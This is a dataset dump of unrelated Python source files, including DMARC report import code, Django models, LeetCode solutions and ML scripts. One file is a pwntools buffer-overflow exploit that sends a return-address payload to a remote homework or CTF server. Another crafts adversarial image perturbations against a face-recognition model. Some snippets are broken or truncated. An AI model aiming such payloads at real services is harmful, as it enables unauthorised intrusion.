text
stringlengths 8
6.05M
|
|---|
__author__ = 'scorpius'
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, with_statement
from cuisine import file_attribs as attributes
from cuisine import file_attribs_get as attributes_get
from cuisine import file_ensure as ensure
from cuisine import file_is_file as exists
from cuisine import file_is_link as is_link
from cuisine import file_link as link
from cuisine import file_local_read as read_local
from cuisine import file_read as read
from cuisine import file_update as update
from cuisine import file_write as write
from fabric.contrib.files import append, comment, contains, sed, uncomment
from revolver import core
from revolver.decorator import inject_use_sudo
append = inject_use_sudo(append)
comment = inject_use_sudo(comment)
contains = inject_use_sudo(contains)
sed = inject_use_sudo(sed)
uncomment = inject_use_sudo(uncomment)
write = inject_use_sudo(write)
def temp(mode=None, owner=None, group=None):
path = core.run('mktemp').stdout
attributes(path, mode=mode, owner=owner, group=group)
return path
def remove(location, recursive=False, force=True):
force = force and '-f' or ''
recursive = recursive and '-r' or ''
core.run('rm %s %s %s' % (force, recursive, location))
def touch(location, mode=None, owner=None, group=None):
core.run('touch %s' % location)
attributes(location, mode=mode, owner=owner, group=group)
def copy(source, destination, force=True, mode=None, owner=None, group=None):
force = force and '-f' or ''
core.run('cp %s %s %s' % (force, source, destination))
attributes(destination, mode=mode, owner=owner, group=group)
|
# Author: George K. Holt
# License: MIT
# Version: 0.1
"""
Part of EPOCH Generate Particles Files.
This file should contain a 2-dimensional particle number density distribution as
a Python function called number_density_2d.
"""
import numpy as np
def gaussian(x, x0, w):
'''A simple Gaussian function centred on x0 with waist w.'''
return np.exp(-(x - x0) ** 2 / (w ** 2))
def number_density_2d(x, y):
'''Return particle number density for given x-y-coordinate.'''
return 1e25 * gaussian(x, 0.2e-6, 1e-6) * gaussian(y, -0.1e-6, 0.5e-6)
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
#context.log_level = 'debug'
# Byte sequence alias
A8 = 8 * b'A'
def main():
payload = 3 * A8
payload += p64(0x4011a1)
#proc = process('./CafeOverflow')
proc = remote('hw00.zoolab.org', 65534)
proc.recvuntil(':')
proc.send(payload)
proc.interactive()
if __name__ == '__main__':
main()
|
"""Internal library."""
import concurrent.futures
import datetime
import email
import fileinput
import getpass
import imaplib
import zipfile
import gzip
import sys
import tldextract
from defusedxml.ElementTree import fromstring
from dns import resolver, reversename
import magic
import six
from django.db import transaction
from django.db.models import Q
from django.utils import timezone
from django.utils.encoding import smart_str
from django.utils.translation import gettext as _
from modoboa.admin import models as admin_models
from modoboa.parameters import tools as param_tools
from . import constants
from . import models
ZIP_CONTENT_TYPES = [
"application/x-zip-compressed",
"application/x-zip",
"application/zip",
"application/gzip",
"application/octet-stream",
"text/xml",
]
FILE_TYPES = [
"text/plain",
"text/xml",
]
def import_record(xml_node, report):
"""Import a record."""
record = models.Record(report=report)
row = xml_node.find("row")
record.source_ip = row.find("source_ip").text
record.count = int(row.find("count").text)
policy_evaluated = row.find("policy_evaluated")
record.disposition = policy_evaluated.find("disposition").text
record.dkim_result = policy_evaluated.find("dkim").text
record.spf_result = policy_evaluated.find("spf").text
reason = policy_evaluated.find("reason")
if reason:
record.reason_type = smart_str(reason.find("type").text)[:14]
if record.reason_type not in constants.ALLOWED_REASON_TYPES:
record.reason_type = "other"
comment = reason.find("comment").text or ""
record.reason_comment = comment
identifiers = xml_node.find("identifiers")
header_from = identifiers.find("header_from").text.split(".")
domain = None
while len(header_from) >= 2:
domain = admin_models.Domain.objects.filter(
name=".".join(header_from)).first()
if domain is not None:
record.header_from = domain
break
header_from = header_from[1:]
if domain is None:
print("Invalid record found (domain not local)")
return None
record.save()
auth_results = xml_node.find("auth_results")
for rtype in ["spf", "dkim"]:
rnode = auth_results.find(rtype)
if not rnode:
continue
models.Result.objects.create(
record=record, type=rtype, domain=rnode.find("domain").text,
result=rnode.find("result").text)
@transaction.atomic
def import_report(content):
"""Import an aggregated report."""
root = fromstring(content, forbid_dtd=True)
metadata = root.find("report_metadata")
print(
"Importing report {} received from {}".format(
metadata.find("report_id").text,
metadata.find("org_name").text)
)
reporter, created = models.Reporter.objects.get_or_create(
email=metadata.find("email").text,
defaults={"org_name": metadata.find("org_name").text}
)
qs = models.Report.objects.filter(
reporter=reporter, report_id=metadata.find("report_id").text)
if qs.exists():
print("Report already imported.")
return
report = models.Report(reporter=reporter)
report.report_id = metadata.find("report_id").text
date_range = metadata.find("date_range")
report.start_date = timezone.make_aware(
datetime.datetime.fromtimestamp(int(date_range.find("begin").text))
)
report.end_date = timezone.make_aware(
datetime.datetime.fromtimestamp(int(date_range.find("end").text))
)
policy_published = root.find("policy_published")
for attr in ["domain", "adkim", "aspf", "p", "sp", "pct"]:
node = policy_published.find(attr)
if node is None or not node.text:
if attr == "sp":
node = fromstring('<sp>unstated</sp>', forbid_dtd=True)
else:
print(f"Report skipped because of malformed data (empty {attr})")
return
value = setattr(report, "policy_{}".format(attr), node.text)
report.save()
for record in root.findall("record"):
import_record(record, report)
def import_archive(archive, content_type=None):
"""Import reports contained inside (file pointer)
- a zip archive,
- a gzip file,
- a xml file.
"""
if content_type == "text/xml":
import_report(archive.read())
elif content_type in ["application/gzip", "application/octet-stream"]:
with gzip.GzipFile(mode="r", fileobj=archive) as zfile:
import_report(zfile.read())
else:
with zipfile.ZipFile(archive, "r") as zfile:
for fname in zfile.namelist():
import_report(zfile.read(fname))
def import_report_from_email(content):
"""Import a report from an email."""
if isinstance(content, six.string_types):
msg = email.message_from_string(content)
elif isinstance(content, six.binary_type):
msg = email.message_from_bytes(content)
else:
msg = email.message_from_file(content)
err = False
for part in msg.walk():
if part.get_content_type() not in ZIP_CONTENT_TYPES:
continue
try:
fpo = six.BytesIO(part.get_payload(decode=True))
# Try to get the actual file type of the buffer
# required to make sure we are dealing with an XML file
file_type = magic.Magic(uncompress=True, mime=True).from_buffer(fpo.read(2048))
fpo.seek(0)
if file_type in FILE_TYPES:
import_archive(fpo, content_type=part.get_content_type())
except (OSError, IOError):
print('Error: the attachment does not match the mimetype')
err = True
else:
fpo.close()
if err:
# Return EX_DATAERR code <data format error> available
# at sysexits.h file
# (see http://www.postfix.org/pipe.8.html)
sys.exit(65)
def import_report_from_stdin():
"""Parse a report from stdin."""
content = six.StringIO()
for line in fileinput.input([]):
content.write(line)
content.seek(0)
if not content:
return
import_report_from_email(content)
def import_from_imap(options):
"""Import reports from an IMAP mailbox."""
obj = imaplib.IMAP4_SSL if options["ssl"] else imaplib.IMAP4
conn = obj(options["host"])
username = input("Username: ")
password = getpass.getpass(prompt="Password: ")
conn.login(username, password)
conn.select(options["mailbox"])
type, msg_ids = conn.search(None, "ALL")
for msg_id in msg_ids[0].split():
typ, content = conn.fetch(msg_id, "(RFC822)")
for response_part in content:
if isinstance(response_part, tuple):
import_report_from_email(response_part[1])
conn.close()
def week_range(year, weeknumber):
"""Return start and end dates of a given week."""
tz = timezone.get_current_timezone()
fmt = "%Y-%W-%w"
start_week = datetime.datetime.strptime(
"{}-{}-{}".format(year, weeknumber, 1), fmt)
end_week = datetime.datetime.strptime(
"{}-{}-{}".format(year, weeknumber, 0), fmt)
return start_week.replace(tzinfo=tz), end_week.replace(tzinfo=tz)
def insert_record(target: dict, record, name: str) -> None:
"""Add a record."""
if name not in target:
target[name] = {}
if record.source_ip not in target[name]:
target[name][record.source_ip] = {
"total": 0,
"spf": {"success": 0, "failure": 0},
"dkim": {"success": 0, "failure": 0}
}
target[name][record.source_ip]["total"] += record.count
for typ in ["spf", "dkim"]:
result = getattr(record, "{}_result".format(typ))
key = "success" if result == "pass" else "failure"
target[name][record.source_ip][typ][key] += record.count
def get_aligment_stats(domain, period=None) -> dict:
"""Retrieve aligment statistics for given domain."""
if not period:
year, week, day = timezone.now().isocalendar()
week -= 1
period = f"{year}-{week}"
else:
year, week = period.split("-")
if not year or not week:
period = f"{year}-{week}"
daterange = week_range(year, week)
qargs = (
(Q(report__start_date__gte=daterange[0],
report__start_date__lte=daterange[1]) |
Q(report__end_date__gte=daterange[0],
report__end_date__lte=daterange[1])) &
Q(header_from=domain)
)
all_records = models.Record.objects.filter(qargs)
stats: dict = {
"aligned": {},
"trusted": {},
"forwarded": {},
"failed": {}
}
dns_names = {}
if param_tools.get_global_parameter("enable_rlookups"):
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 1.0
dns_resolver.lifetime = 1.0
def get_domain_name_from_ip(ip):
addr = reversename.from_address(ip)
try:
resp = dns_resolver.query(addr, "PTR")
ext = tldextract.extract(str(resp[0].target))
if not ext.suffix: # invalid PTR record
raise resolver.NXDOMAIN()
return (ip, '.'.join((ext.domain, ext.suffix)).lower())
except (resolver.NXDOMAIN, resolver.YXDOMAIN,
resolver.NoAnswer, resolver.NoNameservers,
resolver.Timeout):
return (None, None)
ips = (r.source_ip for r in all_records)
with concurrent.futures.ThreadPoolExecutor(max_workers=16) as pool:
dns_names = {i: n for (i, n) in
list(pool.map(get_domain_name_from_ip, ips))}
for record in all_records:
name = dns_names.get(record.source_ip, _("Not resolved"))
if record.dkim_result == "pass" and record.spf_result == "pass":
insert_record(stats["aligned"], record, name)
elif record.dkim_result == "pass" or record.spf_result == "pass":
insert_record(stats["trusted"], record, name)
elif record.reason_type == "local_policy" and record.reason_comment.startswith("arc=pass"):
insert_record(stats["forwarded"], record, name)
else:
insert_record(stats["failed"], record, name)
return stats
|
# 문제 설명
# n개의 음이 아닌 정수가 있습니다. 이 수를 적절히 더하거나 빼서 타겟 넘버를 만들려고 합니다. 예를 들어 [1, 1, 1, 1, 1]로 숫자 3을 만들려면 다음 다섯 방법을 쓸 수 있습니다.
# -1+1+1+1+1 = 3
# +1-1+1+1+1 = 3
# +1+1-1+1+1 = 3
# +1+1+1-1+1 = 3
# +1+1+1+1-1 = 3
# 사용할 수 있는 숫자가 담긴 배열 numbers, 타겟 넘버 target이 매개변수로 주어질 때 숫자를 적절히 더하고 빼서 타겟 넘버를 만드는 방법의 수를 return 하도록 solution 함수를 작성해주세요.
# 제한사항
# 주어지는 숫자의 개수는 2개 이상 20개 이하입니다.
# 각 숫자는 1 이상 50 이하인 자연수입니다.
# 타겟 넘버는 1 이상 1000 이하인 자연수입니다.
# 입출력 예
# numbers target return
# [1, 1, 1, 1, 1] 3 5
def solution(numbers, target):
stack = [0]
while numbers:
number = numbers.pop(0)
sub = []
for i in stack:
sub.append(i + number)
sub.append(i - number)
stack = sub
return stack.count(target)
|
"""
698. Partition to K Equal Sum Subsets
Given an integer array nums and an integer k, return true if it is possible to divide this array into k non-empty subsets whose sums are all equal.
Example 1:
Input: nums = [4,3,2,3,5,2,1], k = 4
Output: true
Explanation: It's possible to divide it into 4 subsets (5), (1, 4), (2,3), (2,3) with equal sums.
Example 2:
Input: nums = [1,2,3,4], k = 3
Output: false
"""
from typing import List
class Solution:
'''
time complexity : O(k * 2^n)
it takes the inner recursion 2^n time to find a good subset.
and we need to do this for k rounds
'''
def canPartitionKSubsets(self, nums: List[int], k: int) -> bool:
if (sum(nums) % k != 0) or (k > len(nums)) or (max(nums) > sum(nums) // k):
return False
def backtrack(nums, k, visited, targetSubsetSum, curSubsetSum, nextIdx) -> bool:
if k == 1:
return True
if curSubsetSum == targetSubsetSum:
return backtrack(nums, k - 1, visited, targetSubsetSum, 0, 0)
for i in range(nextIdx, len(nums)):
if (not visited[i]) and (nums[i] + curSubsetSum <= targetSubsetSum):
visited[i] = True # choose
if backtrack(nums, k, visited, targetSubsetSum, curSubsetSum + nums[i], i + 1):
return True
visited[i] = False # unchoose/backtrack
return False
return backtrack(nums, k, [False] * len(nums), sum(nums) // k, 0, 0)
|
from _typeshed import Incomplete
def write_dot(G, path) -> None: ...
def read_dot(path): ...
def from_pydot(P): ...
def to_pydot(N): ...
def graphviz_layout(G, prog: str = "neato", root: Incomplete | None = None): ...
def pydot_layout(G, prog: str = "neato", root: Incomplete | None = None): ...
|
#
# @lc app=leetcode.cn id=797 lang=python3
#
# [797] 所有可能的路径
#
# @lc code=start
class Solution:
def allPathsSourceTarget(self, graph: List[List[int]]) -> List[List[int]]:
"""
多叉树遍历框架
"""
# 30/30 cases passed (52 ms)
# Your runtime beats 20.08 % of python3 submissions
# Your memory usage beats 66.14 % of python3 submissions (16.1 MB)
self.res = []
path = []
self.traverse(graph, 0, path)
return self.res
def traverse(self, graph, s, path):
# 路径添加当前节点 s
path.append(s)
if s == len(graph) - 1:
# 到达尾结点 len(graph) - 1
self.res.append(path[:])
path.pop()
return
# 递归
for v in graph[s]:
self.traverse(graph, v, path)
# 从路径中移除当前节点 s
path.pop()
# @lc code=end
|
from database.connection.mysql_connection import get_session
class GenericDao():
def insert_record(self,record):
session = get_session()
session.add(record)
session.commit()
session.flush()
print('inserted record :: {}'.format(record))
def get_all_records(self, Type):
return get_session().query(Type).all()
|
from rest_framework import generics
from .models import Signal, SignalResult
from . import permissions, serializers
class Signals(generics.ListAPIView):
queryset = Signal.objects.all()
serializer_class = serializers.SignalSerializer
permission_classes = []
class SignalResults(generics.ListAPIView):
queryset = SignalResult.objects.filter(signal__creator_profile__user_id=13)
serializer_class = serializers.SignalResultSerializer
permission_classes = []
|
#!/usr/bin/env python
from __future__ import print_function
import numpy as np
import math
#Module containing functions used for Kmeans clustering
def closest_centroid(x,centroids):
"""Function for finding the closest closest centroid
Input :
x := numpy array of data
centroids := list of centroids
Output:
out := numpy array of index of closest centroids"""
K =len(centroids)
N = len(x)
Distance = np.zeros((N,K))
for j in range(K):
mu = centroids[j]
Distance[:,j] = np.linalg.norm(x-mu,axis=1)
out = np.argmin(Distance,axis=1)
return out
def update_centroids(x,indices,K):
"""Function for updating centroids
Input:
x := numpy array of data
K:= number of centroids
indices := numpy array of indices of closest centroids
Output :
centroids, variance := updated list of centroids and list of variances
for each cluster"""
centroids = []
variances = []
for j in range(K):
x_closest = x[indices == j,:]
mu = np.mean(x_closest, axis = 0)
variance = np.dot((x_closest-mu).T,x_closest-mu)/len(x_closest)
centroids.append(mu)
variances.append(variance)
return centroids, variances
|
from org.csstudio.opibuilder.scriptUtil import PVUtil
from org.csstudio.opibuilder.scriptUtil import ConsoleUtil
from java.lang import Thread, Runnable
sp1_high_set_2 = display.getWidget("Text_Update_gauge2_sp1_high_set")
sp1_low_set_2 = display.getWidget("Text_Update_gauge2_sp1_low_set")
sp2_high_set_2 = display.getWidget("Text_Update_gauge2_sp1_high_set")
sp2_low_set_2 = display.getWidget("Text_Update_gauge2_sp2_low_set")
sp1_high_set_2PV = sp1_high_set_2.getPV()
sp1_low_set_2PV = sp1_low_set_2.getPV()
sp2_high_set_2PV = sp2_high_set_2.getPV()
sp2_low_set_2PV = sp2_low_set_2.getPV()
sp1_high_low_2PV.setValue(PVUtil.getDouble(sp1_high_set_orig_2))
sp1_low_low_2PV.setValue(PVUtil.getDouble(sp1_low_set_orig_2))
sp2_high_low_2PV.setValue(PVUtil.getDouble(sp2_high_set_orig_2))
sp2_low_low_2PV.setValue(PVUtil.getDouble(sp2_low_set_orig_2))
|
import csv, pdb, copy
from random import randrange, randint
import time
import random
from datetime import timedelta, datetime
from dateutil.relativedelta import relativedelta
def random_date(start, end):
delta = end - start
int_delta = (delta.days * 24 * 60 * 60) + delta.seconds
random_second = randrange(int_delta)
return start + timedelta(seconds=random_second)
with open("data/routes.csv", "r") as in_file:
with open("new_routes.csv", "w") as out_file:
writer = csv.writer(out_file, lineterminator="\n")
reader = csv.reader(in_file)
all = []
headers = next(reader)
price_index = headers.index("Date")
all.append(headers)
for row in reader:
row[price_index] = random_date(datetime.now(), datetime.now()+relativedelta(years=1)).strftime("%Y-%m-%d")
all.append(row)
writer.writerows(all)
|
# coding: utf-8
import socket
import lglass.rpsl
import lglass.database.base
@lglass.database.base.register
class WhoisClientDatabase(lglass.database.base.Database):
""" Simple blocking whois client database """
def __init__(self, hostspec):
self.hostspec = hostspec
def get(self, type, primary_key):
try:
return self.find(primary_key, types=[type], flags="-r")[-1]
except IndexError:
raise KeyError(type, primary_key)
def find(self, primary_key, types=None, flags=None):
send_buffer = b""
recv_buffer = b""
if types is not None:
send_buffer += "-T {types} ".format(types=",".join(types)).encode()
if flags is not None:
send_buffer += flags.encode()
send_buffer += b" "
send_buffer += "{key}".format(key=primary_key).encode()
send_buffer += b"\r\n"
with socket.create_connection(self.hostspec) as sock:
while len(send_buffer):
sent = sock.send(send_buffer)
send_buffer = send_buffer[sent:]
while True:
recvd = sock.recv(1024)
if not len(recvd):
break
recv_buffer += recvd
lines = recv_buffer.decode(errors="replace").splitlines()
lines_iter = iter(lines)
objs = []
while True:
obj = lglass.rpsl.Object.from_iterable(lines_iter, pragmas={
"stop-at-empty-line": True
})
if not obj:
break
objs.append(obj)
return objs
def list(self):
raise NotImplementedError("list() is not supported for WhoisClientDatabase")
def save(self):
raise NotImplementedError("save() is not supported for WhoisClientDatabase")
def delete(self):
raise NotImplementedError("delete() is not supported for WhoisClientDatabase")
@classmethod
def from_url(cls, url):
return cls((url.hostname, url.port if url.port else 43))
@lglass.database.base.register
class RIPEDatabase(WhoisClientDatabase):
def __init__(self, hostspec=None):
if hostspec is None:
hostspec = ("whois.ripe.net", 43)
WhoisClientDatabase.__init__(self, hostspec)
def find(self, primary_key, types=None, flags=None):
if flags is not None:
flags = "-B " + flags
else:
flags = "-B"
return WhoisClientDatabase.find(self, primary_key, types, flags)
def schema(self, type):
results = self.find(type, flags="-t")
if len(results) == 0:
raise KeyError("schema({})".format(type))
return lglass.rpsl.RIPESchemaObject(results[0])
@classmethod
def from_url(cls, url):
return cls()
|
#from mail.models import*
from workstatus.mail.models import Message, User
def addMessage(user, email1, content, time1):
"""adds message to db"""
tempMessage = Message(user = user, emailaddress = email1, content = content, time1 = time1)
tempMessage.save()
def addUser(name, address, first):
user = User(username = name, email = address, first_name = first)
user.save()
|
from django.db import models
from django.contrib.auth.forms import User
class ProductList(models.Model):
"""
Stores the list of products added by the couples
"""
name = models.CharField(max_length=200)
brand = models.CharField(max_length=200, blank=True)
price = models.FloatField()
in_stock_quantity = models.IntegerField()
def __str__(self):
return self.name
class Customer(models.Model):
"""
Stores the couple information
"""
user = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
name = models.CharField(max_length=200, null=True)
email = models.CharField(max_length=100, null=True)
def __str__(self):
return self.name
class Order(models.Model):
"""
Stores the orders placed by the customers
"""
customer = models.ForeignKey(Customer, on_delete=models.CASCADE, null=True, blank=True)
create_dt = models.DateTimeField(auto_now_add=True)
order_fulfilled = models.BooleanField(default=False)
class OrderLineItem(models.Model):
"""
Order line item information of each order.
1:M relationship with orders to Products
"""
product = models.ForeignKey(ProductList, on_delete=models.SET_NULL, null=True)
order = models.ForeignKey(Order, on_delete=models.SET_NULL, null=True)
customer = models.ForeignKey(Customer, on_delete=models.CASCADE, null=True, blank=True)
quantity = models.IntegerField(default=0, null=True, blank=True)
date_added = models.DateTimeField(auto_now_add=True)
status = models.CharField(max_length=200, null=True, default='Pending')
quantity_purchased = models.IntegerField(default=0, null=True, blank=True)
@property
def get_total(self):
total = self.product.price * self.quantity
return total
|
if __name__ == '__main__':
students = list()
# for _ in range(int(input())):
# name = input()
# score = float(input())
# students.append([name, score])
students.append(['Prashant', 32])
students.append(['Pallavi', 36])
students.append(['Dheeraj', 39])
students.append(['Shivam', 40])
print('\ninitial')
for x in students:
print(f'{x[0]} {x[1]}')
minItem = min(x[1] for x in students)
print(f'\nmin {minItem}')
students = list(filter(lambda x: x[1] > minItem, students))
print('\nwithout min')
for x in students:
print(f'{x[0]} {x[1]}')
minItem = min(x[1] for x in students)
print(f'\nmin {minItem}')
students = list(filter(lambda x: x[1] == minItem, students))
print('\nrunner-ups')
for x in students:
print(f'{x[0]} {x[1]}')
students.sort(key=lambda x: x[0], reverse=False)
print('final')
for x in students:
print(x[0])
|
# imports
import pandas as pd
import json
from sklearn.cluster import k_means
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestRegressor
import matplotlib.pyplot as plt
import numpy as np
import re
import matplotlib.pyplot as plt
# load dataset
raw_data = pd.read_csv("data/incident_event_log.csv")
# data preprocessing
# load preprocessing metadata
with open("data/preprocmd.json") as f:
md = json.load(f)
def map_categories(dataset, col_mappings):
results = dataset
for column_name in col_mappings.keys():
results = results.replace({column_name: col_mappings[column_name]})
return results
def extract_numval(x):
match = re.search(r'(\d+)', x)
if match:
result = int(match.group())
else:
result = int(-1) # default value
return result
# Transform categorical values to integers
incilog = map_categories(raw_data, md["col_mappings"])
for column_name in md["numval_cols"]:
incilog[column_name] = list(map(extract_numval, incilog[column_name]))
# Format dates
for column_name in md["datetime_cols"]:
incilog[column_name] = pd.to_datetime(incilog[column_name].map(lambda x: re.sub(r'\?', '', x)))
# Target variable
incilog["time_to_resolution"] = [td.seconds for td in (incilog["resolved_at"] - incilog["opened_at"])]
# Remove negative deltas (either wrong date entries in the resolved_at column or redundant incidents, already resolved)
incilog = incilog[incilog.time_to_resolution >= 0]
# Data segmentation
train, test = train_test_split(incilog, test_size=0.2, random_state=25)
# classify columns
excluded_cols = ["number"] + md["datetime_cols"]
categorical_cols = incilog.columns.difference(excluded_cols).difference(["time_to_resolution"])
# exploratory analysis
print(incilog.head().to_markdown())
# correlations with time_to_resolution
def res_correlation(variable):
return incilog[variable].corr(incilog.time_to_resolution)
correlations = pd.Series([res_correlation(col) for col in categorical_cols], index = categorical_cols)
# Highest "single-factor" correlations
top_15 = correlations[correlations.abs().sort_values(ascending=False).index].head(15)
print(top_15.to_markdown())
# plot distribution of categorical variables
def barplot(variable):
dist = pd.Series(incilog[variable]).value_counts()
plt.bar(range(len(dist.unique)), dist)
fig1, axes1 = plt.subplots(5, 3, figsize=(12, 10))
fig1.subplots_adjust(wspace=0.4, hspace=0.6)
fig1.suptitle("Figure 1. Frequencies of the descriptive variables most correlated with the time_to_resolution")
for c in range(len(top_15.index)):
variable = top_15.index[c]
dist = pd.Series(incilog[variable]).value_counts()
range_vals = range(len(dist.keys()))
axes1[divmod(c, 3)[0]][divmod(c, 3)[1]].set_title(variable)
axes1[divmod(c, 3)[0]][divmod(c, 3)[1]].bar(range_vals, dist)
fig1.savefig("./images/top_15_barplots.png")
# First regressor and feature selection
# random forest
def fit_random_forest(train, features=categorical_cols, n_estimators=50):
forest_model = RandomForestRegressor(n_estimators=n_estimators, criterion="mse")
forest_model.fit(X=train.filter(items=features),
y=train.time_to_resolution)
return forest_model
forest_all_features = fit_random_forest(train, features=categorical_cols)
R2_all_features = forest_all_features.score(test.filter(items=categorical_cols), test.time_to_resolution)
print('R2 with all features: {:f}'.format(R2_all_features))
features_importance = categorical_cols[np.argsort(forest_all_features.feature_importances_)[::-1]]
print(pd.Series(features_importance[:15]).to_markdown())
# forest_top_15 = fit_random_forest(train, features=top_15.index)
# R2_top_15_corr = forest_top_15.score(test.filter(items=top_15.index), test.time_to_resolution)
# print('R2 with top 15 correlated features: {:f}'.format(R2_top_15))
# reduce the number of features in the model and evaluate
# first criterion for ranking features: pair-wise correlation with time_to_resolution
# R2_corr = [R2_top_15_corr]
R2_corr = []
for i in range(15, len(categorical_cols)):
features = correlations.abs().sort_values(ascending=False).index[:i]
forest = fit_random_forest(train, features)
R2_corr.append(forest.score(test.filter(items=features), test.time_to_resolution))
R2_corr.append(R2_all_features)
# second criterion for ranking features: features importance of full random forest
R2_imp = []
for i in range(15, len(categorical_cols)):
features = features_importance[:i]
forest = fit_random_forest(train, features)
R2_imp.append(forest.score(test.filter(items=features), test.time_to_resolution))
R2_imp.append(R2_all_features)
R2 = pd.DataFrame({"corr": R2_corr, "imp": R2_imp}, index = range(15, len(categorical_cols)+1))
R2.to_pickle("./R2.pkl")
fig2, axes2 = plt.subplots(1, 2, figsize=(12, 5))
fig2.subplots_adjust(hspace=0.6)
fig2.suptitle("Figure 2. Evolution of the random forest scores")
axes2[0].set_title("Features ranked by correlation")
axes2[0].plot(R2["corr"])
axes2[0].set_xlabel("Number of features")
axes2[0].set_ylabel("$R^2$")
axes2[0].set(ylim=(0.44, 0.65))
axes2[1].set_title("Features ranked by random forest importance")
axes2[1].plot(R2["imp"])
axes2[1].set_xlabel("Number of features")
axes2[1].set_ylabel("$R^2$")
axes2[1].set(ylim=(0.44, 0.65))
plt.savefig("./images/R2.png")
# clustering
def find_clusters(included_cols, max_clusters=11):
inertiae = {}
best_n_iters = {}
clusters = {}
for c in range(1, max_clusters):
km = k_means(incilog[included_cols], n_clusters=c, return_n_iter=True)
inertiae[c] = km[2]
best_n_iters[c] = km[3]
clusters[c] = km[1]
return inertiae, best_n_iters, clusters
# clusters with all categorical columns
inertiae_all, best_n_iters_all, clusters_all = find_clusters(categorical_cols)
fig3, axes3 = plt.subplots(1, 2, figsize=(12, 5))
fig3.subplots_adjust(hspace=0.6)
fig3.suptitle("Figure 3. K-means metrics")
axes3[0].set_title("K-means inertiae")
axes3[0].plot(inertiae_all.keys(), inertiae_all.values(), marker = "o")
axes3[0].set_xlabel("Number of clusters")
axes3[0].set_ylabel("Inertiae")
axes3[1].set_title("Number of iterations corresponding to the best results")
axes3[1].scatter(best_n_iters_all.keys(), best_n_iters_all.values())
axes3[1].set_xlabel("Number of clusters")
axes3[1].set_ylabel("Number of iterations")
plt.savefig("./images/k_means.png")
# Elbow: 4 clusters
incilog["cluster_all_vars"] = clusters_all[4]
# Explain the clusters
# important features on each cluster
def clusters_features_importance(cluster_column):
cluster_features_importance={}
for c in range(4):
forest = fit_random_forest(incilog[incilog[cluster_column] == c])
cluster_features_importance[c] = categorical_cols[np.argsort(forest.feature_importances_)[::-1]]
return cluster_features_importance
# not very conclusive
# find clusters using less features
inertiae_10, best_n_iters_10, clusters_10 = find_clusters(features_importance[0:10])
plt.plot(inertiae_10.keys(), inertiae_10.values(), marker = "o")
plt.scatter(best_n_iters_10.keys(), best_n_iters_10.values())
# 4 clusters
incilog["cluster_10_vars"] = clusters_10[4]
cf_10_var = clusters_features_importance("cluster_10_vars")
|
from conans import ConanFile, CMake
import os
class DefaultNameConan(ConanFile):
settings = "os", "compiler", "arch", "build_type"
generators = "cmake"
def build(self):
cmake = CMake(self)
cmake.configure(source_dir=self.conanfile_directory, build_dir="./")
cmake.build()
def imports(self):
self.copy(pattern="*.dll", dst="bin", src="bin")
self.copy(pattern="*.dylib", dst="bin", src="lib")
def test(self):
self.run("cd bin && .%senough" % os.sep)
assert os.path.exists(os.path.join(self.deps_cpp_info["zlib"].rootpath, "LICENSE"))
|
# coding: utf-8
# In[ ]:
'''
THIS FUNCTION TAKES IN AN INTEGER INPUT IF ITS DIVISIBLE BY BOTH 3 AND 5 RETURNS FIZZBUZZ
IF ITS DIVISIBLE ONLY BY 3 RETURNS FIZZ
IF ITS DIVISIBLE ONLY BY 5 RETURNS BUZZ
IF ITS NOT DIVISIBLE BY EITHIER IT RETURNS 'NOT DIVISIBLE BY EITHIER 3 AND 5'
'''
def FizzBuzz():
try:
num = int(input('Write your number here: '))
if num % 3 == 0 and num % 5 == 0:
print(num, 'FizzBuzz')
elif num % 3 == 0:
print(num, 'Fizz')
elif num % 5 == 0:
print(num, 'Buzz')
else:
print(num, 'Not Divisible By Eithier 3 and 5')
except:
print('Input a VALID Number')
restart = input('Do you wanna enter another number?, Y or N: ').lower()
if restart == 'y':
FizzBuzz()
else:
print('Bye!')
# In[ ]:
main()
|
from model import loss
import torch
import advertorch
import ctypes
import copy
from torch import equal
from torch import optim
from torch.autograd import Variable
import torch.nn as nn
from torchvision import datasets, transforms
import matplotlib.pyplot as plt
from data_loader.data_loader import BaseDataLoader, VGGFaceDataLoader
from model.models import VGG_Face_PubFig
from utils.metric import DSSIM
from model.optimizer import Adadelta, SGD
from utils.transform import calc_normalize
internal_val = 0
def get_internal_representation(model, img, k=-1):
model(img)
tk_source = internal_val
return tk_source
def hook(model, inputs):
global internal_val
internal_val = inputs[0]
class AdvarsarialLoss(nn.Module):
def __init__(self, attack_model, source, target, lamb=1, budget=0.3):
super(AdvarsarialLoss, self).__init__()
self.model = attack_model
self.source = source
self.target = target
self.tk_target = get_internal_representation(self.model, self.target)
self.lamb = lamb
self.budget = budget
def forward(self, img, tk_img):
term_internal = torch.dist(tk_img, self.tk_target)
dist_perturb = DSSIM(img, self.source)
term_perturb = dist_perturb - self.budget
term_perturb = term_perturb ** 2 if term_perturb > 0 else 0
res = term_internal + self.lamb * term_perturb
return res
class AdversarialAttack:
def __init__(
self,
model: nn.Module,
data_loader: BaseDataLoader,
optimizer: nn.Module,
loss_fn : nn.Module,
num_epochs : int,
budget : float,
lamb : float
):
self.model = model
self.data_loader = data_loader
self.optimizer = optimizer
self.loss_fn = loss_fn
self.num_epochs = num_epochs
self.budget = budget
self.lamb = lamb
def train(self):
source_img, source_label = self.data_loader.get_random_batch()
target_img, target_label = self.data_loader.get_random_batch()
assert (len(source_img) == len(target_img))
perturb_img = Variable(source_img.cuda(), requires_grad=True)
source_img = source_img.cuda()
target_img = target_img.cuda()
loss_fn = AdvarsarialLoss(self.model, source_img, target_img, self.lamb, self.budget)
for epoch in range(self.num_epochs):
tk_perturb = get_internal_representation(self.model, perturb_img)
self.optimizer.zero_grad()
loss = loss_fn(perturb_img, tk_perturb)
print('epoch {} : loss {}'.format(epoch, loss))
loss.backward()
self.optimizer.step()
|
#현재 폴더에 movie.txt라는 파일로 올해 본 영화 두 개를 저장
#그 후 작년에 본 영화 두 개를 a를 사용해서 덮어씌워주세요
#잘 저장되었는가 r로 읽어줍시다.
f = open("movie.txt", "w")
for i in range(2):
movie = input("올해영화 : ")
f.write(movie + "\n")
f.close()
f = open("movie.txt", "a")
for i in range(2):
movie = input("작년영화 : ")
f.write(movie + "\n")
f.close()
f = open("movie.txt", "r")
while True:
line = f.readline() #파일을 한 줄씩 들고와서 저장
if line:
